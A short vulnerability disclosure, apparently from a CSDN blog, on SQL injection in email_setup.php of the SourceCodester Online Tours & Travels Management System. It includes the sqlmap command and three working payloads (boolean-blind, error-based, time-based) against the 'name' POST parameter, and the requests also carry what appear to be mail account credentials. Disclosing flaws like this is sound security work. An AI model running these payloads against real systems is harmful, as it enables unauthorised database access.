SourceCodester Online Tours & Travels Management System email

本文链接：https://blog.csdn.net/xitanging/article/details/134903112

SourceCodester Online Tours & Travels Management System email_setup.php sql injection

Url: admin/email_setup.php

Abstract:

Line 37 of email_setup.php invokes a SQL query built using unvalidated input. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.

Explanation:

SQL injection errors occur when:

Data enters a program from an untrusted source.
The data is used to dynamically construct a SQL query.

In this case the data is passed to prepare() in email_setup.php at line 37.

在这里插入图片描述

python sqlmap.py -r sql.txt

在这里插入图片描述

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: name=Mayuri K.' RLIKE (SELECT (CASE WHEN (6196=6196) THEN 0x4d6179757269204b2e ELSE 0x28 END)) AND 'uWJN'='uWJN&mail_driver_host=mail.gmail.com&mail_port=587&mail_username=mayuri.infospace@gmail.com&mail_password=programmers324&update=

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: name=Mayuri K.' AND EXTRACTVALUE(6478,CONCAT(0x5c,0x71706a7671,(SELECT (ELT(6478=6478,1))),0x717a6b6a71)) AND 'UqZk'='UqZk&mail_driver_host=mail.gmail.com&mail_port=587&mail_username=mayuri.infospace@gmail.com&mail_password=programmers324&update=

    Type: time-based blind
    Title: MySQL >= 5.0.12 RLIKE time-based blind
    Payload: name=Mayuri K.' RLIKE SLEEP(5) AND 'beie'='beie&mail_driver_host=mail.gmail.com&mail_port=587&mail_username=mayuri.infospace@gmail.com&mail_password=programmers324&update=
---

在这里插入图片描述